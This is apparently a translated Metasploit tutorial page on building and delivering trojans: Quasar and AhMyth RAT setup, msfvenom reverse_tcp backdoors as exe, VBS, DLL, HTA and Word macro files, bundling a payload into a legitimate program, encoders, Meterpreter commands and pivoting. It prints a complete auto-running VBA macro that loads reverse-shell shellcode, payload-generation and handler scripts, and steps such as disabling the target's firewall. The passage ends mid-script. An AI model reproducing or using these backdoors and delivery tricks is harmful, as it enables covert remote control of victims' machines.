Metasploit Usage

*These tools are shared for technical discussion and exchange only; using them for any illegal purpose is strictly forbidden.

Quasar

Quasar is a simple remote-administration tool (RAT) with a GUI server and a generated client.

https://github.com/quasar/Quasar/releases/tag/v1.4.0

Download a release from there, then run Quasar.exe to start the server side.

Click Builder to generate the client (the implant). In this setup the Windows target (the notes call it the win2003 box) is 192.168.0.105.

Under Settings, start a listener ("start listening") on the server before running the client on the target.

Disable the Windows firewall on the target (the notes mention win10 here) and the client connects back: the host shows up in the server's client list.

Android trojan setup

https://github.com/AhMyth/AhMyth-Android-RAT/releases

AhMyth is an Android APK RAT; it builds the APK for you and the workflow is the same as with Quasar, so it is not covered further here.

MSF trojan setup

x86 Windows backdoor

Generate the backdoor:

```shell
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows \
  -f exe -o ./viru.exe LHOST=<ip> LPORT=4444
# this writes an .exe backdoor carrying the Meterpreter reverse_tcp stager
```

Start the handler in msf:

```shell
msfconsole -q            # -q: quiet start, skips the banner
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
# there are many payloads; the one set here must match what msfvenom generated
set LHOST <ip>           # the IP the reverse shell connects back to, i.e. the kali host
set LPORT <port>
run                      # or: exploit; starts listening
```

MSF VBS trojan setup

Generating a Windows VBS script trojan

```shell
msfvenom -l formats   # list the output formats msfvenom can generate
```

For VBS you only need to change the output format (`-f vbs`). Typing the whole command each time is tedious, so wrap it in a script:

```shell
#!/bin/sh
# windows_x86.sh: generate an x86 Windows Meterpreter reverse_tcp .exe
ip=192.168.119.123
port=4444
arch=x86
platform=windows
format=exe
payload=windows/meterpreter/reverse_tcp
out=../Backs/meter_re_tcp_x86.exe

msfvenom -p "$payload" LHOST="$ip" LPORT="$port" -a "$arch" -f "$format" --platform "$platform" -o "$out"
```

Save it as windows_x86.sh; whenever you need a new .exe backdoor, change the IP and run the script.

Opening the handler in msfconsole every time is just as tedious, so put those commands in a resource file and run it with:

```shell
msfconsole -r <file>
```

Bundling the trojan

First you need a legitimate executable to bundle the payload into (`-x`):

```shell
ip=192.168.119.123
port=4444
arch=x86
platform=windows
format=exe
payload=windows/meterpreter/reverse_tcp
x=/home/kali/Desktop/hfs.exe    # the program the payload is bundled into (the template)

out=../Backs/meter_re_tcp_x86.exe

msfvenom -p "$payload" LHOST="$ip" LPORT="$port" -a "$arch" -f "$format" -x "$x" --platform "$platform" -o "$out"
```

Without `-k` the template's own functionality is replaced by the payload; add `-k` if the bundled program should keep working while the payload runs in a separate thread.
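The generator script and the handler resource file above are written separately, which is how LHOST/LPORT/payload drift apart between the two. The following helper is an added example (not code from the page and not part of Metasploit) that builds the msfvenom argument vector, including the `-x`/`-k` bundling options, and writes the matching multi/handler resource file from one configuration. The `PayloadConfig` class, function names and the `handler.rc` file name are this example's own choices; `msfvenom` is only invoked when `--run` is given.

```python
#!/usr/bin/env python3
"""Build a msfvenom command and the matching multi/handler resource file.

Hypothetical helper: it assembles argv and the .rc text from one config so the
payload, LHOST and LPORT cannot differ between generator and listener.
"""
import argparse
import shlex
import subprocess
import sys
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class PayloadConfig:
    lhost: str
    lport: int = 4444
    payload: str = "windows/meterpreter/reverse_tcp"
    arch: str = "x86"
    platform: str = "windows"
    fmt: str = "exe"
    out: str = "./meter_re_tcp_x86.exe"
    template: Optional[str] = None  # -x: legitimate executable to bundle with
    keep: bool = False              # -k: keep template behaviour, payload in a new thread


def msfvenom_argv(cfg: PayloadConfig) -> List[str]:
    """msfvenom argument vector; -x/-k only appear when a template is set."""
    if cfg.keep and not cfg.template:
        raise ValueError("-k is only meaningful together with -x <template>")
    argv = ["msfvenom", "-p", cfg.payload,
            f"LHOST={cfg.lhost}", f"LPORT={cfg.lport}",
            "-a", cfg.arch, "--platform", cfg.platform,
            "-f", cfg.fmt, "-o", cfg.out]
    if cfg.template:
        argv += ["-x", cfg.template]
        if cfg.keep:
            argv.append("-k")
    return argv


def handler_rc(cfg: PayloadConfig) -> str:
    """Text of a msfconsole resource file for the matching listener.

    ExitOnSession false plus exploit -j -z keeps the handler alive as a
    background job, so several implants can check in without restarting it.
    """
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {cfg.payload}",
        f"set LHOST {cfg.lhost}",
        f"set LPORT {cfg.lport}",
        "set ExitOnSession false",
        "exploit -j -z",
        "",
    ])


def main(argv: Optional[List[str]] = None) -> int:
    ap = argparse.ArgumentParser(description="msfvenom + handler.rc from one config")
    ap.add_argument("lhost", help="IP the implant connects back to")
    ap.add_argument("--lport", type=int, default=4444)
    ap.add_argument("--template", help="executable to bundle with (-x)")
    ap.add_argument("--keep", action="store_true", help="add -k (needs --template)")
    ap.add_argument("--rc", default="handler.rc", help="resource file to write")
    ap.add_argument("--run", action="store_true", help="actually invoke msfvenom")
    a = ap.parse_args(argv)
    cfg = PayloadConfig(lhost=a.lhost, lport=a.lport, template=a.template, keep=a.keep)
    cmd = msfvenom_argv(cfg)
    with open(a.rc, "w") as f:
        f.write(handler_rc(cfg))
    print(shlex.join(cmd))
    print(f"handler written to {a.rc}; start it with: msfconsole -q -r {a.rc}")
    return subprocess.call(cmd) if a.run else 0


if __name__ == "__main__":
    sys.exit(main())
```

Usage: `python3 gen.py 192.168.119.123 --template /home/kali/Desktop/hfs.exe --keep --run` prints the exact msfvenom command it ran and leaves `handler.rc` beside it; the listener then comes up with `msfconsole -q -r handler.rc`.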

MSF DLL trojan

Change `-f` to `dll` and msfvenom writes the trojan as a DLL instead of an .exe.

Run it with rundll32, which ships with every Windows installation:

```shell
rundll32.exe C:\path\to\back.dll,<ExportName>
```

The payload runs from the DLL's entry point as soon as the library is loaded, so the export name after the comma only has to get rundll32 to load the file.

MSF DLL hijacking

A DLL holds functions an .exe loads at run time: instead of compiling every feature into one binary, the program calls into a dynamic link library when it needs that functionality. DLL hijacking abuses how the loader searches for such a library: if a trojan DLL with the expected name sits where the loader looks first (for example next to the executable), it is loaded in place of the real one.

The details are fairly involved and are left for a later deep dive.

MSF HTA trojan

HTA files get past some AV products. Only the format changes: `-f hta-psh`. The generated HTA launches PowerShell, which runs the stager and gives the reverse shell.

MSF trojan obfuscation (encoder)

```shell
msfvenom -e <encoder> -i 3    # -i: number of encoding iterations, here 3
```

Encoders rewrite the payload bytes (their real job is avoiding bad characters). They are often sold as AV evasion, but that is almost useless in practice: AV signatures cover the common decoder stubs.

```shell
msfvenom -x <template> -k     # -k: keep the template's original behaviour; the payload runs in a separate thread
```

Meterpreter

File operations

Payload formats (`msfvenom -l formats`):

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript

The raw format writes the payload's source code; choosing py/python instead gives you shellcode formatted as a Python string.

```shell
msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o /home/kali/Desktop/back.py   # raw: the Python script itself
```

```shell
msf6 payload(python/meterpreter/reverse_tcp) > generate -f py -o /home/kali/Desktop/back.py
[*] Writing 3196 bytes to /home/kali/Desktop/back.py...
# with -f py the file holds the payload bytes as a Python byte string (shellcode), not a runnable script
```

So to generate something the target can execute directly, use the raw format.

MSF auxiliary modules

MSF ships many auxiliary scanner and gather modules.

msf6 > use auxiliary/gather/browser_info    # collects information about a visiting browser
msf6 auxiliary(gather/browser_info) > show options

Module options (auxiliary/gather/browser_info):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Retries  true             no        Allow the browser to retry the module
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on (our kali IP). This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  A web server that collects information about the browser.

# set our IP address and port (port 81 in this run)
msf6 auxiliary(gather/browser_info) > set srvhost 192.168.65.4
srvhost => 192.168.65.4
msf6 auxiliary(gather/browser_info) > set srvport 81
srvport => 81
msf6 auxiliary(gather/browser_info) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(gather/browser_info) > 
[*] Using URL: http://192.168.65.4:81/VgdDwPqbj
[*] Server started.

Open that link in Chrome on the target and the module prints Chrome's details in the kali console.

MSF encoder modules

msf6 > show encoders
# with msfvenom the -e flag selects one of these encoders; the PHP encoder is used as the example below
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -l encoders

Framework Encoders [--encoder value>]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

# test it with a PHP payload
show payloads
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.65.4 LPORT=4444 -f raw -o /home/kali/Desktop/back.php
# this writes back.php; open it and it is plain PHP payload source, nothing encoded

Now run the same payload through an encoder:

┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.65.4 LPORT=4444 -f raw -o /home/kali/Desktop/back.php -e php/base64 
# with php/base64 the file now holds the base64-wrapped form of the same code; this is encoding, not encryption, and is trivially reversed

Evasion modules

# MSF also has evasion modules (`show evasion`), which are meant to produce AV-evading payloads

MSF post modules

msf6 > show post
# post modules are post-exploitation modules: once you have a session they run against that host, not only to collect information but also to perform actions on it

MSF plugins

# plugins are helper tools loaded into the console; this is the default set shipped with MSF
msf6 > load -l
[*] Available Framework plugins:
    * sounds
    * wmap
    * ips_filter
    * beholder
    * rssfeed
    * libnotify
    * session_notifier
    * event_tester
    * auto_add_route
    * sample
    * sqlmap
    * socket_logger
    * thread
    * nessus
    * nexpose
    * ffautoregen
    * request
    * db_tracker
    * session_tagger
    * token_adduser
    * wiki
    * msgrpc
    * openvas
    * alias
    * msfd
    * db_credcollect
    * token_hunter
    * pcap_log
    * aggregator
    * besecure
    * lab

# a plugin is loaded with load <name>, e.g. the sqlmap plugin:
msf6 > load sqlmap 
[*] Sqlmap plugin loaded
[*] Successfully loaded plugin: Sqlmap

MSF database

systemctl start postgresql
sudo msfdb init
db_status        # database connection status
hosts            # hosts seen or attacked so far
services         # discovered services
notes            # detailed notes per host
loot             # files and data collected from compromised hosts

MSF also provides workspaces, which keep different engagements apart:

workspace -a xxx    # create a workspace named xxx
workspace -v        # verbose listing of the workspaces
msf6 exploit(windows/smb/ms17_010_eternalblue) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
         default  1      0         1      0      0      1
*        Red256   0      0         0      0      0      0
workspace xxx     # switch to workspace xxx
db_disconnect     # disconnect from the database
db_connect        # connect to the database
msf6 > db_connect msf:JaT0FUrIngVkSyeFPtsvgAnCyTyDBzcO6H6RHqtDcCI=@localhost:5432/msf
[*] Connected to Postgres data service: localhost/msf
db_save           # save the current data service as the default, so it is reconnected on the next start
msf6 exploit(windows/smb/ms17_010_eternalblue) > db_save 
Successfully saved data service as default: local_db_service

When you need to reconnect with db_connect, the PostgreSQL connection parameters are in /usr/share/metasploit-framework/config/database.yml.

MSF macro attack

msfvenom can output the vba or vba-exe format here; in testing the vba output was the more reliable of the two.

For the macro to fire, macros must be enabled in Word first:

File --> Options --> Trust Center --> Trust Center Settings --> Macro Settings --> Enable all macros

Then enable the Developer tab.

The Developer tab now appears in the ribbon; create a new macro from there and the VBA editor opens.

Next, generate the malicious code in MSF:

# generate the malicious macro with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.65.4 LPORT=4444 -f vba -o /home/kali/Desktop/back.vba 

# MSF also has a module that builds a macro-enabled document directly
search macro

use exploit/multi/fileformat/office_word_macro    # generates a Word document with the macro embedded

Contents of the generated back.vba:

```vba
#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Afab As Long, ByVal Qssg As Long, ByVal Pcmeos As LongPtr, Azeqtcz As Long, ByVal Ezpcxnw As Long, Bwknwv As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Mmdpsaam As Long, ByVal Rcgqsabm As Long, ByVal Ipsylb As Long, ByVal Msku As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Pkr As LongPtr, ByRef Hokvmpbxl As Any, ByVal Bck As Long) As LongPtr
#Else
    Private Declare Function CreateThread Lib "kernel32" (ByVal Afab As Long, ByVal Qssg As Long, ByVal Pcmeos As Long, Azeqtcz As Long, ByVal Ezpcxnw As Long, Bwknwv As Long) As Long
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Mmdpsaam As Long, ByVal Rcgqsabm As Long, ByVal Ipsylb As Long, ByVal Msku As Long) As Long
    Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Pkr As Long, ByRef Hokvmpbxl As Any, ByVal Bck As Long) As Long
#End If

Sub Auto_Open()
    Dim Wmofp As Long, Ugfnt As Variant, Grpdzgctz As Long
#If VBA7 Then
    Dim Vkybp As LongPtr, Koxt As LongPtr
#Else
    Dim Vkybp As Long, Koxt As Long
#End If
    ' Ugfnt holds the raw x86 reverse_tcp stager as decimal bytes (LHOST and LPORT are embedded in it)
    Ugfnt = Array(232, 143, 0, 0, 0, 96, 49, 210, 137, 229, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 49, 255, 15, 183, 74, 38, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 73, 117, 239, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 76, 1, 208, 80, 139, 88, 32, 139, 72, 24, 1, 211, 133, 201, 116, 60, 73, 139, _
52, 139, 49, 255, 1, 214, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 224, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 233, 128, 255, 255, 255, 93, 104, 51, 50, 0, 0, 104, 119, 115, 50, 95, 84, _
104, 76, 119, 38, 7, 137, 232, 255, 208, 184, 144, 1, 0, 0, 41, 196, 84, 80, 104, 41, 128, 107, 0, 255, 213, 106, 10, 104, 192, 168, 65, 4, 104, 2, 0, 17, 92, 137, 230, 80, 80, 80, 80, 64, 80, 64, 80, 104, 234, 15, 223, 224, 255, 213, 151, 106, 16, 86, 87, 104, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 255, 78, 8, 117, 236, 232, 103, 0, 0, 0, _
106, 0, 106, 4, 86, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 54, 139, 54, 106, 64, 104, 0, 16, 0, 0, 86, 106, 0, 104, 88, 164, 83, 229, 255, 213, 147, 83, 106, 0, 86, 83, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 104, 0, 64, 0, 0, 106, 0, 80, 104, 11, 47, 15, 48, 255, 213, 87, 104, 117, 110, 77, 97, 255, 213, _
94, 94, 255, 12, 36, 15, 133, 112, 255, 255, 255, 233, 155, 255, 255, 255, 1, 195, 41, 198, 117, 193, 195, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213)

    ' The page's listing is cut off after this point; the remainder is the standard msfvenom VBA
    ' template (assumed): allocate RWX memory (MEM_COMMIT, PAGE_EXECUTE_READWRITE), copy the bytes in,
    ' and start a thread on them.
    Vkybp = VirtualAlloc(0, UBound(Ugfnt), &H1000, &H40)
    For Grpdzgctz = LBound(Ugfnt) To UBound(Ugfnt)
        Wmofp = Ugfnt(Grpdzgctz)
        Koxt = RtlMoveMemory(Vkybp + Grpdzgctz, Wmofp, 1)
    Next Grpdzgctz
    Koxt = CreateThread(0, 0, Vkybp, 0, 0, 0)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
```

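Two artifacts on this page carry their callback address in the clear: the back.vba macro above (the decimal byte array is the unencoded x86 reverse_tcp stager, and the bytes `104, 192, 168, 65, 4, 104, 2, 0, 17, 92` are the `push <ip>` / `push <family+port>` that build the sockaddr_in) and the php/base64-encoded back.php from the encoder section (base64 is encoding, not encryption). The script below is an added triage example, not code from the page or from Metasploit: it pulls the byte array out of a msfvenom VBA macro and reads LHOST/LPORT from the stager's sockaddr pattern, and it unwraps a php/base64 payload and reads `$ip`/`$port` from the PHP source. The sample macro fragment and the sample PHP text are constructed for the example (the fragment reuses a slice of the array above), and the byte patterns assume an unmodified msfvenom stager with no encoder applied to the shellcode.

```python
#!/usr/bin/env python3
"""Recover the C2 address from msfvenom artifacts (added triage helper).

Not part of the page or of Metasploit. Handles:
  * a VBA macro whose shellcode is a decimal Array(...)   -> x86/x64 reverse_tcp stager
  * a php/base64-encoded PHP payload                       -> eval(base64_decode(...)) wrapper
Assumption: unmodified msfvenom stager, no encoder on the shellcode bytes.
"""
import base64
import re
import struct
import sys
from typing import Optional, Tuple

# x86 stager builds sockaddr_in with: push 0x0a ; push <ip> ; push 0x5c110002
#   -> bytes 68 <ip:4> 68 02 00 <port:2 big-endian>
X86_SOCKADDR = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.S)
# x64 stager loads the whole sockaddr_in with: mov r12, imm64
#   -> bytes 49 BC 02 00 <port:2 big-endian> <ip:4>
X64_SOCKADDR = re.compile(rb"\x49\xbc\x02\x00(.{2})(.{4})", re.S)


def vba_array_bytes(macro_text: str) -> bytes:
    """Collect the decimal byte list from the Array(...) of a msfvenom VBA macro.
    VBA line continuations (' _') and newlines inside the Array are tolerated."""
    m = re.search(r"Array\((.*?)\)", macro_text, re.S)
    if not m:
        raise ValueError("no Array(...) found in macro")
    vals = [int(x) for x in re.findall(r"\d+", m.group(1).replace("_", " "))]
    if any(v > 255 for v in vals):
        raise ValueError("value outside byte range; not a byte array")
    return bytes(vals)


def stager_c2(shellcode: bytes) -> Optional[Tuple[str, int]]:
    """(LHOST, LPORT) embedded in a reverse_tcp stager, or None if no pattern matches."""
    m = X86_SOCKADDR.search(shellcode)
    if m:
        ip, port = m.group(1), m.group(2)
    else:
        m = X64_SOCKADDR.search(shellcode)
        if not m:
            return None
        port, ip = m.group(1), m.group(2)
    return ".".join(str(b) for b in ip), struct.unpack(">H", port)[0]


def php_base64_decode(php_text: str) -> str:
    """Undo the php/base64 encoder: it only wraps the payload in eval(base64_decode(...))."""
    m = re.search(r"base64_decode\(\s*['\"]?([A-Za-z0-9+/=\s]+?)['\"]?\s*\)", php_text)
    if not m:
        raise ValueError("no base64_decode(...) call found")
    b64 = re.sub(r"\s+", "", m.group(1))
    b64 += "=" * (-len(b64) % 4)  # restore padding if the encoder stripped it
    return base64.b64decode(b64).decode("utf-8", "replace")


def php_c2(php_text: str) -> Optional[Tuple[str, int]]:
    """(ip, port) from the $ip/$port assignments of a php meterpreter payload, encoded or not."""
    src = php_base64_decode(php_text) if "base64_decode" in php_text else php_text
    ip = re.search(r"\$ip\s*=\s*['\"]([^'\"]+)['\"]", src)
    port = re.search(r"\$port\s*=\s*(\d+)", src)
    if not (ip and port):
        return None
    return ip.group(1), int(port.group(1))


# Constructed sample: a truncated macro whose Array reuses slices of the back.vba listing above.
SAMPLE_VBA = """Sub Auto_Open()
    Ugfnt = Array(232, 143, 0, 0, 0, 96, 49, 210, 137, 229, 100, 139, 82, 48, _
    255, 213, 106, 10, 104, 192, 168, 65, 4, 104, 2, 0, 17, 92, 137, 230, 80, _
    94, 94, 255, 12, 36, 15, 133, 112, 255, 255, 255, 233, 155, 255, 255, 255)
End Sub
"""

# Constructed sample: a stand-in for php/base64 output wrapping a minimal payload header.
_PHP_PLAIN = "$ip = '192.168.65.4';\n$port = 4444;\n/* ... rest of the php/meterpreter stub ... */"
SAMPLE_PHP = "eval(base64_decode('" + base64.b64encode(_PHP_PLAIN.encode()).decode() + "'));"


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else None
    if text is None:
        print("vba macro  ->", stager_c2(vba_array_bytes(SAMPLE_VBA)))
        print("php/base64 ->", php_c2(SAMPLE_PHP))
    elif "Array(" in text:
        print("vba macro  ->", stager_c2(vba_array_bytes(text)))
    else:
        print("php        ->", php_c2(text))
```

Run it with no arguments to see both samples resolve to 192.168.65.4:4444, or pass a captured back.vba or back.php as the only argument. An encoder such as x86/shikata_ga_nai applied to the shellcode itself would hide the pattern until the decoder stub runs, which is exactly why encoders are still not AV evasion: the stub is what gets signatured.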
Meterpreter: execute

execute -h lists the options:

    -a <opt>  The arguments to pass to the command.   # arguments for the command
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.   # the visible host process when -m is used
    -f <opt>  The executable command to run.   # the command to execute
    -h        Help menu.
    -i        Interact with the process after creating it.   # interactive; normally used with cmd
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.   # the executable is read from the attacker's disk and run inside the dummy process; it is never written to the target
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token

Run notepad:

meterpreter > execute -f notepad
Process 5248 created.
meterpreter > execute -f notepad -a test.txt
# there is a test.txt on the desktop, so this opens that file
Process 5340 created.
# if the file does not exist, notepad pops up a dialog asking whether to create it

# run a cmd shell
meterpreter > execute -f cmd -i
Process 6056 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Red256\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FEAF-EA72

 Directory of C:\Users\Red256\Desktop

2021/07/05  21:45    <DIR>          .
2021/07/05  21:45    <DIR>          ..
2021/06/24  17:20    <DIR>          [non-ASCII name, garbled in the capture]
2021/07/05  21:24            73,802 back.exe
2021/06/24  17:09    <DIR>          MantraPortable
2021/07/04  22:01               585 msf.rtf
2021/07/02  23:24    <DIR>          [non-ASCII name, garbled in the capture]
2021/06/24  22:07               881 phpStudy.lnk
2021/07/02  23:44            12,862 shell.docx
2021/07/05  21:45                 5 test.txt
2021/02/19  15:06    <DIR>          win10jh
2021/06/29  18:11    <DIR>          [non-ASCII name, garbled in the capture]

(The target is a Chinese-language Windows 7; the localized cmd output is shown here in its English form.)

Creating a puppet process

Give -f a program from the local (attacker) machine, together with -m and -d notepad:

meterpreter > execute -f /home/kali/Desktop/cmd.exe -m -d notepad
Process 3424 created.
# in theory this runs cmd inside a notepad process window, but in my case it did not work

MSF pivoting

Pivoting means using a compromised host as a jump box. My environment is macOS, where setting up such a lab is fiddly, so in short: a host in the domain has two network cards on different segments; kali can only reach one segment, but there is another segment behind that host, and that is where pivoting comes in.

Lab VM configuration:

1. A bridged adapter connects the VMs to the outside.
2. NAT handles VM-to-VM traffic and VM-to-host connectivity.

On my Windows machine I run two VMs: one with IP 10.10.168.2, and one with two NICs, 10.10.168.3 / 192.168.0.110.

msf6 exploit(multi/handler) > set lhost 192.168.0.111
lhost => 192.168.0.111
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.111:4444 
[*] Sending stage (175174 bytes) to 192.168.0.110
[*] Meterpreter session 1 opened (192.168.0.111:4444 -> 192.168.0.110:1273) at 2021-07-08 10:30:27 -0400

# 192.168.0.110 checks in first. Scanning the 10.x segment from kali now cannot work, since kali has no route there
meterpreter > run post/multi/manage/autoroute 
# this module adds pivot routes automatically, taken from the session host's routing table

[!] SESSION may not be compatible with this module (incompatible session platform: windows)
[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.168.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.

msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
# now the portscan module reaches hosts in the 10.x segment through the session
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 10.10.168.2:          - 10.10.168.2:21 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:139 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:135 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:445 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:777 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:1025 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:1029 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:1030 - TCP OPEN
[+] 10.10.168.2:          - 10.10.168.2:1028 - TCP OPEN

# the 10.x host is reachable now, even though kali itself sits in the 192.x segment
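What autoroute did above is add three entries to the framework's pivot route table, and every module socket is then matched against that table; the most specific matching route decides which session carries the traffic, which is why the portscan reaches 10.10.168.2 through session 1. The small model below is an added example (not Metasploit code): it parses the `[+] Route added to subnet ...` lines autoroute printed, answers "which session would carry traffic to this address?", and strips the route autoroute added for the attacker's own subnet (192.168.0.0/24 here), since with that route in place traffic to kali's own segment is also pushed through the pivot. The autoroute output is the one from this page, embedded as sample input; the function names are this example's own.

```python
#!/usr/bin/env python3
"""Model of Metasploit's pivot route table after post/multi/manage/autoroute.

Added illustration, not framework code. A route is (subnet, session id); the
most specific matching subnet wins, and an address with no route stays on the
local network stack.
"""
import ipaddress
from typing import List, Optional, Tuple

Route = Tuple[ipaddress.IPv4Network, int]


def parse_autoroute_output(text: str, session: int) -> List[Route]:
    """Routes from the '[+] Route added to subnet A/M ...' lines autoroute prints."""
    routes: List[Route] = []
    for line in text.splitlines():
        if "Route added to subnet" in line:
            net = line.split("subnet", 1)[1].split()[0]        # e.g. 10.10.168.0/255.255.255.0
            routes.append((ipaddress.ip_network(net, strict=False), session))
    return routes


def route_for(dst: str, routes: List[Route]) -> Optional[int]:
    """Session id that should carry traffic to dst; None means the local stack."""
    addr = ipaddress.ip_address(dst)
    best: Optional[Route] = None
    for net, sess in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, sess)                                  # longest prefix match
    return best[1] if best else None


def prune_attacker_subnet(routes: List[Route], lhost: str) -> List[Route]:
    """Drop routes covering the attacker's own address: autoroute adds every subnet
    the session host knows, including the one kali lives in, and that route would
    send traffic for kali's own segment through the pivot. In msfconsole the same
    cleanup is 'route del 192.168.0.0/24 1' (check with 'route print')."""
    me = ipaddress.ip_address(lhost)
    return [(net, sess) for net, sess in routes if me not in net]


# Sample input: the autoroute output captured on this page, session 1.
SAMPLE_AUTOROUTE = """\
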